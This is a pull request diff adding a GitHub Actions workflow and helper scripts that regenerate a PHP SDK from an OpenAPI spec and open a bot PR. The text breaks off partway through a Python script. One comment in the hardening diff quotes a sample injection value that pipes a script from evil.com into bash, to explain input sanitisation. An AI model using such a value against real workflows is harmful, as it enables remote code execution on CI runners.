### PR TITLE
[SPN-2933] PHP SDK: Add polling, diff, versioning, and PR orchestration

### DIFF
--- a/.github/workflows/sdk-update.yml
+++ b/.github/workflows/sdk-update.yml
@@ -99,13 +99,23 @@ jobs:
         run: docker pull openapitools/openapi-generator-cli:v7.16.0
 
       # ----- Fetch and validate ---------------------------------------------
+      # workflow_dispatch input values are passed through env vars rather
+      # than spliced directly into the run: script. ${{ inputs.* }} is
+      # expanded by GitHub before the shell sees it, so a crafted value
+      # like `"; curl evil.com | bash; echo "` would inject commands.
+      # Env-var substitution keeps the values inert (just bash variable
+      # expansion, not source-level interpolation).
       - name: Fetch spec + sidecars
         id: fetch
+        env:
+          SPEC_URL: ${{ inputs.spec_url }}
+          SHA256_URL: ${{ inputs.sha256_url }}
+          METADATA_URL: ${{ inputs.metadata_url }}
         run: |
           ARGS=()
-          [ -n "${{ inputs.spec_url }}" ] && ARGS+=(--spec-url "${{ inputs.spec_url }}")
-          [ -n "${{ inputs.sha256_url }}" ] && ARGS+=(--sha256-url "${{ inputs.sha256_url }}")
-          [ -n "${{ inputs.metadata_url }}" ] && ARGS+=(--metadata-url "${{ inputs.metadata_url }}")
+          [ -n "$SPEC_URL" ] && ARGS+=(--spec-url "$SPEC_URL")
+          [ -n "$SHA256_URL" ] && ARGS+=(--sha256-url "$SHA256_URL")
+          [ -n "$METADATA_URL" ] && ARGS+=(--metadata-url "$METADATA_URL")
           python scripts/fetch_spec.py "${ARGS[@]}"
 
       # If steps.fetch.outputs.changed != 'true', every subsequent step's

--- a/.github/workflows/sdk-update.yml
+++ b/.github/workflows/sdk-update.yml
@@ -406,7 +406,14 @@ jobs:
           ADD_LABELS_CSV="$(IFS=,; echo "${ADD_LABELS[*]}")"
 
           # Check for an existing open PR on the auto/sdk-update branch.
-          EXISTING_PR="$(gh pr list --head auto/sdk-update --state open --json number --jq '.[0].number' || true)"
+          # `.[0].number // empty` is the load-bearing detail: on an empty
+          # PR list, `.[0]` returns null, `null.number` returns null, and
+          # gojq renders that as the literal string "null" — which would
+          # pass [ -n "$EXISTING_PR" ] and send us into the gh pr edit
+          # branch with the string "null" as the PR number. `// empty`
+          # substitutes jq's `empty` (no output) for nulls, so EXISTING_PR
+          # is genuinely the empty string when no PR exists.
+          EXISTING_PR="$(gh pr list --head auto/sdk-update --state open --json number --jq '.[0].number // empty' || true)"
           if [ -n "$EXISTING_PR" ]; then
             gh pr edit "$EXISTING_PR" \
               --title "$TITLE" \

--- a/.github/workflows/sdk-update.yml
+++ b/.github/workflows/sdk-update.yml
@@ -1,0 +1,395 @@
+name: SDK Update
+
+# Phase 1: workflow_dispatch only. Cron is intentionally commented out
+# until we've verified the workflow end-to-end against the production
+# CloudFront sidecars (depends on SPN-2925).
+#
+# schedule:
+#   - cron: "0 14 * * 1-5"  # weekdays 14:00 UTC = 8am MT
+on:
+  workflow_dispatch:
+    inputs:
+      spec_url:
+        description: "Override URL for public-openapi.yaml (CloudFront docs host or file:// only)"
+        required: false
+      sha256_url:
+        description: "Override URL for the .sha256 sidecar"
+        required: false
+      metadata_url:
+        description: "Override URL for spec-metadata.json"
+        required: false
+
+concurrency:
+  group: sdk-generation
+  cancel-in-progress: true
+
+jobs:
+  update:
+    name: Fetch, regenerate, open PR
+    runs-on: ubuntu-latest
+    timeout-minutes: 25
+
+    permissions:
+      contents: write
+      pull-requests: write
+      issues: write  # required so `gh label create` can manage repo labels
+
+    steps:
+      # Auth model:
+      #   - actions/checkout's default GITHUB_TOKEN is enough for same-repo
+      #     git push (the bot's force-push to auto/sdk-update) and for the
+      #     gh pr create/edit/list calls below.
+      #   - The GHM-375 deploy key (loaded via ssh-agent below) is scoped to
+      #     the private BambooHR/phpcs repo, so composer install can resolve
+      #     bamboohr/phpcs over SSH. The deploy key does NOT authorize
+      #     anything against bhr-api-php itself.
+      - name: Check out master
+        uses: actions/checkout@v6
+        with:
+          ref: master
+          fetch-depth: 0  # need history so we can diff vs auto/sdk-update
+
+      # Load the deploy key issued by GHM-375 so composer can fetch
+      # bamboohr/phpcs over SSH. See generate.yml for the security note.
+      #
+      # ⚠️ SECURITY: this repository is PUBLIC. The deploy key grants read
+      # access to a private repo. Do NOT add steps that print contents of
+      # vendor/bamboohr/phpcs/** (or anything else from a private dep) to
+      # workflow logs or upload them as artifacts — those become world-
+      # readable.
+      - name: Load private-repo deploy key
+        # v0.10.0 runs on Node 24; v0.9.0 is Node 20 and will break on
+        # GitHub-hosted runners after the Node-20 removal window.
+        uses: webfactory/ssh-agent@v0.10.0
+        with:
+          ssh-private-key: ${{ secrets.GHM_375_PRIVATE_REPO_DEPLOY_KEY }}
+
+      - name: Set up PHP
+        uses: shivammathur/setup-php@v2
+        with:
+          php-version: "8.1"
+          tools: composer
+          coverage: none
+
+      - name: Install Composer dependencies
+        run: composer install --prefer-dist --no-progress --no-interaction
+
+      # Python is needed for the orchestration scripts (fetch_spec.py,
+      # build_pr_body.py, bump_version.py). All three are stdlib-only — no
+      # pip install required.
+      - name: Set up Python
+        uses: actions/setup-python@v6
+        with:
+          python-version: "3.12"
+
+      - name: Install oasdiff
+        # PINNED to v1.16.0: v1.17.0 introduced a "media-type walker" refactor
+        # (commit 21e8eb4, PR #943, part of #936) that migrated the response
+        # min/max checks to a new path which dereferences propertyDiff.Revision
+        # without a nil guard. Our public spec triggers a SIGSEGV panic during
+        # `oasdiff breaking` analysis. v1.16.0 predates the migration of those
+        # checks and is the last known-good version. Revisit once an upstream
+        # fix lands — search the oasdiff repo for the panic in
+        # check_response_property_max_increased.go.
+        run: |
+          curl -fsSL https://raw.githubusercontent.com/oasdiff/oasdiff/main/install.sh \
+            | version=1.16.0 sh
+
+      - name: Pull OpenAPI Generator Docker image
+        run: docker pull openapitools/openapi-generator-cli:v7.16.0
+
+      # ----- Fetch and validate ---------------------------------------------
+      - name: Fetch spec + sidecars
+        id: fetch
+        run: |
+          ARGS=()
+          [ -n "${{ inputs.spec_url }}" ] && ARGS+=(--spec-url "${{ inputs.spec_url }}")
+          [ -n "${{ inputs.sha256_url }}" ] && ARGS+=(--sha256-url "${{ inputs.sha256_url }}")
+          [ -n "${{ inputs.metadata_url }}" ] && ARGS+=(--metadata-url "${{ inputs.metadata_url }}")
+          python scripts/fetch_spec.py "${ARGS[@]}"
+
+      # If steps.fetch.outputs.changed != 'true', every subsequent step's
+      # `if:` guard short-circuits and the job exits cleanly with success.
+
+      # ----- Analyze --------------------------------------------------------
+      - name: Run oasdiff analysis
+        if: steps.fetch.outputs.changed == 'true'
+        id: analyze
+        run: |
+          mkdir -p .sdk-update/analysis
+          bash scripts/analyze_spec.sh \
+            specs/public.yaml \
+            "${{ steps.fetch.outputs.staged_spec_path }}" \
+            .sdk-update/analysis
+          BREAKING=$(cat .sdk-update/analysis/breaking-exit)
+          echo "breaking_exit=$BREAKING" >> "$GITHUB_OUTPUT"
+          if [ "$BREAKING" = "1" ]; then
+            echo "has_breaking=true" >> "$GITHUB_OUTPUT"
+          else
+            echo "has_breaking=false" >> "$GITHUB_OUTPUT"
+          fi
+
+      - name: Classify semver bump
+        if: steps.fetch.outputs.changed == 'true'
+        id: classify
+        run: |
+          bash scripts/classify_semver.sh \
+            --changelog-json .sdk-update/analysis/changelog.json \
+            --breaking-exit "${{ steps.analyze.outputs.breaking_exit }}" \
+            > .sdk-update/classification.txt
+          LEVEL=$(head -1 .sdk-update/classification.txt)
+          echo "level=$LEVEL" >> "$GITHUB_OUTPUT"
+
+      # ----- Replace committed spec + metadata ------------------------------
+      - name: Update committed spec + metadata
+        if: steps.fetch.outputs.changed == 'true'
+        env:
+          RESOLVED_SPEC_URL: ${{ steps.fetch.outputs.resolved_spec_url }}
+          SOURCE_COMMIT: ${{ steps.fetch.outputs.source_commit }}
+          CHECKSUM_SHA256: ${{ steps.fetch.outputs.checksum_sha256 }}
+          GENERATED_AT: ${{ steps.fetch.outputs.generated_at }}
+        run: |
+          cp "${{ steps.fetch.outputs.staged_spec_path }}" specs/public.yaml
+          python -c '
+          import json, os, pathlib
+          path = pathlib.Path("specs/spec-source.json")
+          data = json.loads(path.read_text()) if path.exists() else {}
+          data["source_commit"] = os.environ["SOURCE_COMMIT"]
+          data["checksum_sha256"] = os.environ["CHECKSUM_SHA256"]
+          data["generated_at"] = os.environ["GENERATED_AT"]
+          data["url"] = os.environ["RESOLVED_SPEC_URL"]
+          path.write_text(json.dumps(data, indent=2) + "\n")
+          '
+
+      # ----- Generate + quality checks --------------------------------------
+      # `make generate` is the only step the others truly depend on (they all
+      # need the regenerated tree). Format / lint / smoke / test all run
+      # independently after generate so reviewers see every signal on a single
+      # run instead of just "the first thing that broke." Each is
+      # continue-on-error so the workflow proceeds to open the bot PR
+      # regardless, and the "Determine generation status" step tiers the
+      # outcomes into one of three states.
+      - name: make generate
+        if: steps.fetch.outputs.changed == 'true'
+        id: generate
+        continue-on-error: true
+        run: make generate
+
+      - name: make format
+        if: steps.fetch.outputs.changed == 'true' && steps.generate.outcome == 'success'
+        id: format
+        continue-on-error: true
+        run: make format
+
+      - name: make lint
+        if: steps.fetch.outputs.changed == 'true' && steps.generate.outcome == 'success'
+        id: lint
+        continue-on-error: true
+        run: make lint
+
+      - name: make smoke-test
+        if: steps.fetch.outputs.changed == 'true' && steps.generate.outcome == 'success'
+        id: smoke
+        continue-on-error: true
+        run: make smoke-test
+
+      - name: make test
+        if: steps.fetch.outputs.changed == 'true' && steps.generate.outcome == 'success'
+        id: test
+        continue-on-error: true
+        run: make test
+
+      # Three-tier status so reviewers can tell apart the structural failure
+      # ("the SDK isn't buildable, don't merge") from the quality failure
+      # ("the SDK is buildable but has lint/test issues to look at"):
+      #
+      #   generation-failed  — `make generate` itself didn't succeed; the
+      #                        regenerated tree is missing or broken. PR opens
+      #                        with the spec update committed but no usable
+      #                        SDK; reviewer needs to investigate before merge.
+      #   quality-issues     — generate succeeded but one or more of
+      #                        format/lint/smoke/test failed. SDK is structurally
+      #                        valid; the issues are usually small and fixable.
+      #   success            — everything green; safe to merge once reviewed.
+      - name: Determine generation status
+        if: steps.fetch.outputs.changed == 'true'
+        id: status
+        run: |
+          if [ "${{ steps.generate.outcome }}" != "success" ]; then
+            echo "result=generation-failed" >> "$GITHUB_OUTPUT"
+          elif [ "${{ steps.format.outcome }}" = "success" ] \
+               && [ "${{ steps.lint.outcome }}" = "success" ] \
+               && [ "${{ steps.smoke.outcome }}" = "success" ] \
+               && [ "${{ steps.test.outcome }}" = "success" ]; then
+            echo "result=success" >> "$GITHUB_OUTPUT"
+          else
+            echo "result=quality-issues" >> "$GITHUB_OUTPUT"
+          fi
+
+      # ----- Skip-if-no-meaningful-changes ----------------------------------
+      - name: Check git diff for meaningful changes
+        if: steps.fetch.outputs.changed == 'true'
+        id: diff
+        run: |
+          if [ -z "$(git status --porcelain)" ]; then
+            echo "Working tree clean after generation — no meaningful changes to publish."
+            echo "has_changes=false" >> "$GITHUB_OUTPUT"
+          else
+            echo "has_changes=true" >> "$GITHUB_OUTPUT"
+          fi
+
+      # ----- Bump version (skip on major or generation-failed) --------------
+      # bump_version.py updates both composer.json and the Makefile's
+      # PACKAGE_VERSION (the source openapi-generator uses for artifactVersion).
+      # Keeping them in sync means the NEXT regen doesn't silently undo our
+      # bump.
+      - name: Bump version
+        if: |
+          steps.fetch.outputs.changed == 'true'
+          && steps.diff.outputs.has_changes == 'true'
+          && steps.classify.outputs.level != 'major'
+          && steps.status.outputs.result == 'success'
+        id: bump
+        run: python scripts/bump_version.py "${{ steps.classify.outputs.level }}"
+
+      # ----- Compute "since last review" delta ------------------------------
+      - name: Compute delta vs existing auto/sdk-update branch
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        id: delta
+        run: |
+          # Stage current changes so `git diff` includes them.
+          git add -A
+          if git ls-remote --exit-code --heads origin auto/sdk-update >/dev/null 2>&1; then
+            git fetch origin auto/sdk-update:refs/remotes/origin/auto-sdk-update
+            git diff --stat refs/remotes/origin/auto-sdk-update -- > .sdk-update/since-last-review.txt
+          else
+            : > .sdk-update/since-last-review.txt
+          fi
+          echo "path=.sdk-update/since-last-review.txt" >> "$GITHUB_OUTPUT"
+
+      # ----- Build PR body --------------------------------------------------
+      - name: Stage spec metadata for PR body
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        env:
+          RESOLVED_SPEC_URL: ${{ steps.fetch.outputs.resolved_spec_url }}
+          SOURCE_COMMIT: ${{ steps.fetch.outputs.source_commit }}
+          GENERATED_AT: ${{ steps.fetch.outputs.generated_at }}
+        run: |
+          python -c '
+          import json, os, pathlib
+          pathlib.Path(".sdk-update/metadata.json").write_text(json.dumps({
+              "source_commit": os.environ["SOURCE_COMMIT"],
+              "generated_at": os.environ["GENERATED_AT"],
+              "url": os.environ["RESOLVED_SPEC_URL"],
+          }, indent=2) + "\n")
+          '
+
+      - name: Build PR body
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        id: body
+        run: |
+          python scripts/build_pr_body.py \
+            --classification .sdk-update/classification.txt \
+            --changelog-md .sdk-update/analysis/changelog.md \
+            --spec-metadata .sdk-update/metadata.json \
+            --since-last-review .sdk-update/since-last-review.txt \
+            --generation-status "${{ steps.status.outputs.result }}" \
+            --old-version "${{ steps.bump.outputs.old_version }}" \
+            --new-version "${{ steps.bump.outputs.new_version }}" \
+            > .sdk-update/pr-body.md
+
+      # ----- Force-push to auto/sdk-update ----------------------------------
+      - name: Configure git identity
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        run: |
+          git config user.name "bhr-sdk-bot"
+          git config user.email "bhr-sdk-bot@users.noreply.github.com"
+
+      - name: Commit changes
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        run: |
+          git add -A
+          MSG_TITLE="[auto] SDK update — spec ${{ steps.fetch.outputs.source_commit }}"
+          git commit -m "$MSG_TITLE" || echo "Nothing to commit"
+
+      - name: Force-push to auto/sdk-update
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        run: git push --force origin HEAD:refs/heads/auto/sdk-update
+
+      # ----- Open or update PR ---------------------------------------------
+      # Make sure every label the next step might add or remove actually
+      # exists on the repo. `gh pr edit --add-label "a,b,c"` validates all
+      # names up-front and fails the whole call if any one is missing —
+      # which would silently kill the workflow when we introduce a new
+      # label name in code without remembering to pre-create it in the UI.
+      # `gh label create --force` is the idempotent equivalent: creates if
+      # missing, updates color/description if present, exits 0 either way.
+      - name: Ensure workflow labels exist
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          gh label create "auto-generated"    --color "c9f7b1" --force \
+            --description "PR opened automatically by the sdk-update workflow"
+          gh label create "breaking"          --color "b60205" --force \
+            --description "Contains breaking API changes (semver major)"
+          gh label create "generation-failed" --color "b60205" --force \
+            --description "make generate did not succeed on the latest run"
+          gh label create "quality-issues"    --color "fbca04" --force \
+            --description "Generation succeeded but format/lint/smoke/test reported issues"
+
+      - name: Create or update PR
+        if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          TITLE="[auto] SDK update (${{ steps.classify.outputs.level }}) — spec ${{ steps.fetch.outputs.source_commit }}"
+
+          # Build the exact label set for this run. `auto-generated` is
+          # always present; `breaking`, `generation-failed`, and
+          # `quality-issues` are toggled based on this run's outcomes.
+          # See the "Determine generation status" step for tier definitions.
+          ADD_LABELS=("auto-generated")
+          REMOVE_LABELS=()
+          if [ "${{ steps.analyze.outputs.has_breaking }}" = "true" ]; then
+            ADD_LABELS+=("breaking")
+          else
+            REMOVE_LABELS+=("breaking")
+          fi
+          case "${{ steps.status.outputs.result }}" in
+            generation-failed)
+              ADD_LABELS+=("generation-failed")
+              REMOVE_LABELS+=("quality-issues")
+              ;;
+            quality-issues)
+              ADD_LABELS+=("quality-issues")
+              REMOVE_LABELS+=("generation-failed")
+              ;;
+            success)
+              REMOVE_LABELS+=("generation-failed" "quality-issues")
+              ;;
+          esac
+
+          ADD_LABELS_CSV="$(IFS=,; echo "${ADD_LABELS[*]}")"
+
+          # Check for an existing open PR on the auto/sdk-update branch.
+          EXISTING_PR="$(gh pr list --head auto/sdk-update --state open --json number --jq '.[0].number' || true)"
+          if [ -n "$EXISTING_PR" ]; then
+            gh pr edit "$EXISTING_PR" \
+              --title "$TITLE" \
+              --body-file .sdk-update/pr-body.md \
+              --add-label "$ADD_LABELS_CSV"
+            # Reconcile stale conditional labels. --remove-label is a no-op
+            # if the label isn't present, so this is safe to run unconditionally.
+            for label in "${REMOVE_LABELS[@]}"; do
+              gh pr edit "$EXISTING_PR" --remove-label "$label" || true
+            done
+          else
+            gh pr create \
+              --base master \
+              --head auto/sdk-update \
+              --title "$TITLE" \
+              --body-file .sdk-update/pr-body.md \
+              --label "$ADD_LABELS_CSV" \
+              --reviewer "BambooHR/platapi"
+          fi

--- a/.github/workflows/sdk-update.yml
+++ b/.github/workflows/sdk-update.yml
@@ -125,11 +125,13 @@ jobs:
       - name: Run oasdiff analysis
         if: steps.fetch.outputs.changed == 'true'
         id: analyze
+        env:
+          STAGED_SPEC_PATH: ${{ steps.fetch.outputs.staged_spec_path }}
         run: |
           mkdir -p .sdk-update/analysis
           bash scripts/analyze_spec.sh \
             specs/public.yaml \
-            "${{ steps.fetch.outputs.staged_spec_path }}" \
+            "$STAGED_SPEC_PATH" \
             .sdk-update/analysis
           BREAKING=$(cat .sdk-update/analysis/breaking-exit)
           echo "breaking_exit=$BREAKING" >> "$GITHUB_OUTPUT"
@@ -142,10 +144,12 @@ jobs:
       - name: Classify semver bump
         if: steps.fetch.outputs.changed == 'true'
         id: classify
+        env:
+          BREAKING_EXIT: ${{ steps.analyze.outputs.breaking_exit }}
         run: |
           bash scripts/classify_semver.sh \
             --changelog-json .sdk-update/analysis/changelog.json \
-            --breaking-exit "${{ steps.analyze.outputs.breaking_exit }}" \
+            --breaking-exit "$BREAKING_EXIT" \
             > .sdk-update/classification.txt
           LEVEL=$(head -1 .sdk-update/classification.txt)
           echo "level=$LEVEL" >> "$GITHUB_OUTPUT"
@@ -158,8 +162,9 @@ jobs:
           SOURCE_COMMIT: ${{ steps.fetch.outputs.source_commit }}
           CHECKSUM_SHA256: ${{ steps.fetch.outputs.checksum_sha256 }}
           GENERATED_AT: ${{ steps.fetch.outputs.generated_at }}
+          STAGED_SPEC_PATH: ${{ steps.fetch.outputs.staged_spec_path }}
         run: |
-          cp "${{ steps.fetch.outputs.staged_spec_path }}" specs/public.yaml
+          cp "$STAGED_SPEC_PATH" specs/public.yaml
           python -c '
           import json, os, pathlib
           path = pathlib.Path("specs/spec-source.json")
@@ -224,13 +229,19 @@ jobs:
       - name: Determine generation status
         if: steps.fetch.outputs.changed == 'true'
         id: status
+        env:
+          GENERATE_OUTCOME: ${{ steps.generate.outcome }}
+          FORMAT_OUTCOME: ${{ steps.format.outcome }}
+          LINT_OUTCOME: ${{ steps.lint.outcome }}
+          SMOKE_OUTCOME: ${{ steps.smoke.outcome }}
+          TEST_OUTCOME: ${{ steps.test.outcome }}
         run: |
-          if [ "${{ steps.generate.outcome }}" != "success" ]; then
+          if [ "$GENERATE_OUTCOME" != "success" ]; then
             echo "result=generation-failed" >> "$GITHUB_OUTPUT"
-          elif [ "${{ steps.format.outcome }}" = "success" ] \
-               && [ "${{ steps.lint.outcome }}" = "success" ] \
-               && [ "${{ steps.smoke.outcome }}" = "success" ] \
-               && [ "${{ steps.test.outcome }}" = "success" ]; then
+          elif [ "$FORMAT_OUTCOME" = "success" ] \
+               && [ "$LINT_OUTCOME" = "success" ] \
+               && [ "$SMOKE_OUTCOME" = "success" ] \
+               && [ "$TEST_OUTCOME" = "success" ]; then
             echo "result=success" >> "$GITHUB_OUTPUT"
           else
             echo "result=quality-issues" >> "$GITHUB_OUTPUT"
@@ -260,7 +271,9 @@ jobs:
           && steps.classify.outputs.level != 'major'
           && steps.status.outputs.result == 'success'
         id: bump
-        run: python scripts/bump_version.py "${{ steps.classify.outputs.level }}"
+        env:
+          LEVEL: ${{ steps.classify.outputs.level }}
+        run: python scripts/bump_version.py "$LEVEL"
 
       # ----- Compute "since last review" delta ------------------------------
       - name: Compute delta vs existing auto/sdk-update branch
@@ -297,15 +310,19 @@ jobs:
       - name: Build PR body
         if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
         id: body
+        env:
+          GENERATION_STATUS: ${{ steps.status.outputs.result }}
+          OLD_VERSION: ${{ steps.bump.outputs.old_version }}
+          NEW_VERSION: ${{ steps.bump.outputs.new_version }}
         run: |
           python scripts/build_pr_body.py \
             --classification .sdk-update/classification.txt \
             --changelog-md .sdk-update/analysis/changelog.md \
             --spec-metadata .sdk-update/metadata.json \
             --since-last-review .sdk-update/since-last-review.txt \
-            --generation-status "${{ steps.status.outputs.result }}" \
-            --old-version "${{ steps.bump.outputs.old_version }}" \
-            --new-version "${{ steps.bump.outputs.new_version }}" \
+            --generation-status "$GENERATION_STATUS" \
+            --old-version "$OLD_VERSION" \
+            --new-version "$NEW_VERSION" \
             > .sdk-update/pr-body.md
 
       # ----- Force-push to auto/sdk-update ----------------------------------
@@ -317,9 +334,11 @@ jobs:
 
       - name: Commit changes
         if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
+        env:
+          SOURCE_COMMIT: ${{ steps.fetch.outputs.source_commit }}
         run: |
           git add -A
-          MSG_TITLE="[auto] SDK update — spec ${{ steps.fetch.outputs.source_commit }}"
+          MSG_TITLE="[auto] SDK update — spec $SOURCE_COMMIT"
           git commit -m "$MSG_TITLE" || echo "Nothing to commit"
 
       - name: Force-push to auto/sdk-update
@@ -352,8 +371,12 @@ jobs:
         if: steps.fetch.outputs.changed == 'true' && steps.diff.outputs.has_changes == 'true'
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          LEVEL: ${{ steps.classify.outputs.level }}
+          SOURCE_COMMIT: ${{ steps.fetch.outputs.source_commit }}
+          HAS_BREAKING: ${{ steps.analyze.outputs.has_breaking }}
+          STATUS_RESULT: ${{ steps.status.outputs.result }}
         run: |
-          TITLE="[auto] SDK update (${{ steps.classify.outputs.level }}) — spec ${{ steps.fetch.outputs.source_commit }}"
+          TITLE="[auto] SDK update ($LEVEL) — spec $SOURCE_COMMIT"
 
           # Build the exact label set for this run. `auto-generated` is
           # always present; `breaking`, `generation-failed`, and
@@ -361,12 +384,12 @@ jobs:
           # See the "Determine generation status" step for tier definitions.
           ADD_LABELS=("auto-generated")
           REMOVE_LABELS=()
-          if [ "${{ steps.analyze.outputs.has_breaking }}" = "true" ]; then
+          if [ "$HAS_BREAKING" = "true" ]; then
             ADD_LABELS+=("breaking")
           else
             REMOVE_LABELS+=("breaking")
           fi
-          case "${{ steps.status.outputs.result }}" in
+          case "$STATUS_RESULT" in
             generation-failed)
               ADD_LABELS+=("generation-failed")
               REMOVE_LABELS+=("quality-issues")

--- a/.gitignore
+++ b/.gitignore
@@ -33,3 +33,8 @@ composer.phar
 
 # macOS
 .DS_Store
+
+# SDK update workflow scratch dir (sdk-update.yml). Holds the staged
+# spec, oasdiff outputs, classifier results, and the composed PR body.
+# Must not be swept into the auto/sdk-update PR commit.
+.sdk-update/

--- a/.openapi-generator-ignore
+++ b/.openapi-generator-ignore
@@ -22,3 +22,13 @@
 # Then explicitly reverse the ignore rule for a single file:
 #!docs/README.md
 
+# Protect our own CI workflows + CODEOWNERS. The current PHP target
+# template doesn't emit anything under .github/, so this is purely
+# defensive — it future-proofs us against an upstream openapi-generator
+# release that decides to start writing default workflow files there.
+# Mirrors the same defense in bhr-api-python, which DID hit this
+# (the Python target writes .github/workflows/python.yml, and an
+# overly-aggressive post-gen cleanup script collateral-deleted the
+# whole .github/ tree on every regen — see bhr-api-python#29).
+.github/**
+

--- a/scripts/analyze_spec.sh
+++ b/scripts/analyze_spec.sh
@@ -1,0 +1,95 @@
+#!/usr/bin/env bash
+
+# analyze_spec.sh — run oasdiff against an old/new spec pair and capture
+# the artifacts that downstream steps (classify_semver.sh, build_pr_body.py,
+# the GitHub Actions workflow) need.
+#
+# Usage:
+#   analyze_spec.sh OLD_SPEC NEW_SPEC OUTPUT_DIR
+#
+# Writes into OUTPUT_DIR:
+#   breaking-exit         The numeric exit code from `oasdiff breaking`.
+#                         0 = no breaking, 1 = breaking found, >1 = oasdiff error.
+#   breaking-output.txt   Human-readable breaking-changes report (stderr of
+#                         the breaking call). Empty file when there are none.
+#   changelog.json        `oasdiff changelog -f json` output. Always written.
+#   changelog.md          `oasdiff changelog -f markdown` output. Always written.
+#
+# Stdout: the resolved OUTPUT_DIR path so the caller can chain steps.
+#
+# Exit codes:
+#   0  Analysis ran (regardless of whether breaking changes were found).
+#   1  Bad arguments or missing spec files.
+#   2  oasdiff itself errored (exit code >1 from any invocation).
+
+set -eo pipefail
+
+if [ "$#" -ne 3 ]; then
+    echo "Usage: $0 OLD_SPEC NEW_SPEC OUTPUT_DIR" >&2
+    exit 1
+fi
+
+OLD_SPEC="$1"
+NEW_SPEC="$2"
+OUTPUT_DIR="$3"
+
+if [ ! -f "$OLD_SPEC" ]; then
+    echo "analyze_spec: OLD_SPEC not found: $OLD_SPEC" >&2
+    exit 1
+fi
+if [ ! -f "$NEW_SPEC" ]; then
+    echo "analyze_spec: NEW_SPEC not found: $NEW_SPEC" >&2
+    exit 1
+fi
+
+if ! command -v oasdiff >/dev/null 2>&1; then
+    echo "analyze_spec: oasdiff is required but not installed. See https://www.oasdiff.com/" >&2
+    exit 2
+fi
+
+mkdir -p "$OUTPUT_DIR"
+OUTPUT_DIR="$(cd "$OUTPUT_DIR" && pwd)"
+
+# Mirror classify_semver.sh — suppress scope-related noise via the shared
+# severity-levels file when present.
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+SEVERITY_FILE="$SCRIPT_DIR/oasdiff-severity-levels.txt"
+SEVERITY_FLAG=()
+if [ -f "$SEVERITY_FILE" ]; then
+    SEVERITY_FLAG=(--severity-levels "$SEVERITY_FILE")
+fi
+
+# --- Breaking ---------------------------------------------------------------
+# `oasdiff breaking --fail-on ERR`: 0 = no breaking, 1 = breaking found,
+# >1 = oasdiff itself errored. We capture stderr (the report) and the exit
+# code; we do NOT propagate exit 1 — that's data, not a failure.
+BREAKING_EXIT=0
+oasdiff breaking --fail-on ERR "${SEVERITY_FLAG[@]}" "$OLD_SPEC" "$NEW_SPEC" \
+    >"$OUTPUT_DIR/breaking-output.txt" 2>&1 || BREAKING_EXIT=$?
+
+if [ "$BREAKING_EXIT" -gt 1 ]; then
+    echo "analyze_spec: oasdiff breaking failed (exit $BREAKING_EXIT)" >&2
+    cat "$OUTPUT_DIR/breaking-output.txt" >&2
+    exit 2
+fi
+echo "$BREAKING_EXIT" >"$OUTPUT_DIR/breaking-exit"
+
+# --- Changelog (JSON) -------------------------------------------------------
+# JSON feeds classify_semver.sh via its --changelog-json flag.
+oasdiff changelog -f json "${SEVERITY_FLAG[@]}" "$OLD_SPEC" "$NEW_SPEC" \
+    >"$OUTPUT_DIR/changelog.json" 2>"$OUTPUT_DIR/changelog-stderr.log" || {
+    echo "analyze_spec: oasdiff changelog (json) failed" >&2
+    cat "$OUTPUT_DIR/changelog-stderr.log" >&2
+    exit 2
+}
+
+# --- Changelog (markdown) ---------------------------------------------------
+# Markdown is what we paste into the PR body.
+oasdiff changelog -f markdown "${SEVERITY_FLAG[@]}" "$OLD_SPEC" "$NEW_SPEC" \
+    >"$OUTPUT_DIR/changelog.md" 2>>"$OUTPUT_DIR/changelog-stderr.log" || {
+    echo "analyze_spec: oasdiff changelog (markdown) failed" >&2
+    cat "$OUTPUT_DIR/changelog-stderr.log" >&2
+    exit 2
+}
+
+echo "$OUTPUT_DIR"

--- a/scripts/build_pr_body.py
+++ b/scripts/build_pr_body.py
@@ -1,0 +1,196 @@
+#!/usr/bin/env python3
+"""
+Compose the markdown body for the auto/sdk-update PR.
+
+This is pure composition — all git/oasdiff/classifier work happens in the
+workflow before this runs, and the results are passed in as files. That
+makes the script trivially testable: feed it sample inputs, diff stdout
+against a fixture.
+
+Inputs (all optional, but most produce richer output when provided):
+    --classification    Path to classify_semver.sh stdout (line 1: level,
+                        line 2+: "Reason: ..." and any --apply line).
+    --changelog-md      Path to `oasdiff changelog -f markdown` output.
+    --spec-metadata     Path to spec-metadata.json (source_commit, generated_at, url).
+    --source-repo-url   Base URL of the spec source repo. Default points
+                        at BambooHR/main on github.com.
+    --since-last-review Path to a pre-computed delta-vs-existing-branch text
+                        file. Pass --since-last-review="" (or omit) to
+                        render the "Initial PR" placeholder.
+    --generation-status One of: success, quality-issues, generation-failed.
+                        Each tier shows a different banner (or none) at the
+                        top of the PR body.
+    --old-version       Previous version (e.g. 1.0.0).
+    --new-version       Bumped version (e.g. 1.1.0); pass equal to old to
+                        skip the version-bump section.
+
+Output: markdown on stdout.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+
+
+def read_optional(path: str | None) -> str:
+    if not path:
+        return ""
+    file_path = Path(path)
+    if not file_path.exists():
+        return ""
+    return file_path.read_text(encoding="utf-8")
+
+
+def parse_classification(text: str) -> tuple[str, str]:
+    """Returns (level, reason). Tolerant of empty input."""
+    if not text.strip():
+        return ("", "")
+    lines = [line for line in text.splitlines() if line.strip()]
+    level = lines[0].strip() if lines else ""
+    reason = ""
+    for line in lines[1:]:
